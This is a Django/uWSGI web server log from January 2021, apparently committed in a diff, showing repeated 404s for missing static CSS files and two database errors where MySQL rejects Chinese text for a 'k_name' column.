+[pid: 2069|app: 0|req: 503/624] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 504/625] 219.228.146.7 () {38 vars in 872 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 505/626] 219.228.146.7 () {38 vars in 928 bytes} [Thu Jan 14 07:57:11 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 506/627] 219.228.146.7 () {38 vars in 820 bytes} [Thu Jan 14 07:57:11 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 507/628] 219.228.146.7 () {38 vars in 818 bytes} [Thu Jan 14 07:57:11 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 508/629] 219.228.146.7 () {48 vars in 1025 bytes} [Thu Jan 14 07:57:13 2021] POST /kind-manage/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 509/630] 219.228.146.7 () {40 vars in 931 bytes} [Thu Jan 14 07:57:13 2021] GET /kind-manage/ => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 510/631] 219.228.146.7 () {38 vars in 884 bytes} [Thu Jan 14 07:57:13 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 511/632] 219.228.146.253 () {40 vars in 934 bytes} [Thu Jan 14 07:57:18 2021] GET /kind-manage/? => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 513/633] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 514/634] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 515/635] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 516/636] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 517/637] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 518/638] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:57:18 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 518/639] 219.228.146.253 () {48 vars in 1027 bytes} [Thu Jan 14 07:57:18 2021] POST /kind-manage/ => generated 206957 bytes in 171 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 519/640] 219.228.146.146 () {42 vars in 936 bytes} [Thu Jan 14 07:57:25 2021] GET /kind-manage/ => generated 6423 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 520/641] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 521/642] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 522/643] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 523/644] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 524/645] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 525/646] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 526/647] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:57:25 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 527/648] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:57:25 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 528/649] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:57:25 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 529/650] 219.228.146.253 () {40 vars in 935 bytes} [Thu Jan 14 07:57:35 2021] GET /kind-manage/? => generated 6423 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 531/651] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 532/652] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 533/653] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 534/654] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 535/655] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 536/656] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xB1\\x82\\xE5\\x8A\\xA9...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xB1\\x82\\xE5\\x8A\\xA9...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 536/657] 219.228.146.253 () {48 vars in 1029 bytes} [Thu Jan 14 07:57:35 2021] POST /kind-manage/? => generated 207040 bytes in 149 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 537/658] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:57:35 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 538/659] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:57:35 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 539/660] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:57:35 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 540/661] 219.228.146.253 () {40 vars in 932 bytes} [Thu Jan 14 07:57:40 2021] GET /announcement => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 541/662] 219.228.146.253 () {40 vars in 936 bytes} [Thu Jan 14 07:57:40 2021] GET /announcement/ => generated 8247 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 542/663] 219.228.146.253 () {38 vars in 884 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 543/664] 219.228.146.253 () {38 vars in 896 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 544/665] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:57:40 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 545/666] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 546/667] 219.228.146.253 () {38 vars in 853 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 547/668] 219.228.146.253 () {38 vars in 819 bytes} [Thu Jan 14 07:57:40 2021] GET /static/css/animate.css => generated 3513 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 548/669] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 549/670] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 550/671] 219.228.146.253 () {38 vars in 929 bytes} [Thu Jan 14 07:57:40 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 551/672] 219.228.146.253 () {48 vars in 1029 bytes} [Thu Jan 14 07:57:47 2021] POST /announcement/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 552/673] 219.228.146.253 () {40 vars in 935 bytes} [Thu Jan 14 07:57:47 2021] GET /announcement/ => generated 7421 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 553/674] 219.228.146.253 () {38 vars in 885 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 554/675] 219.228.146.253 () {38 vars in 889 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 555/676] 219.228.146.253 () {38 vars in 853 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 556/677] 219.228.146.253 () {38 vars in 897 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 557/678] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 558/679] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 559/680] 219.228.146.253 () {38 vars in 929 bytes} [Thu Jan 14 07:57:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
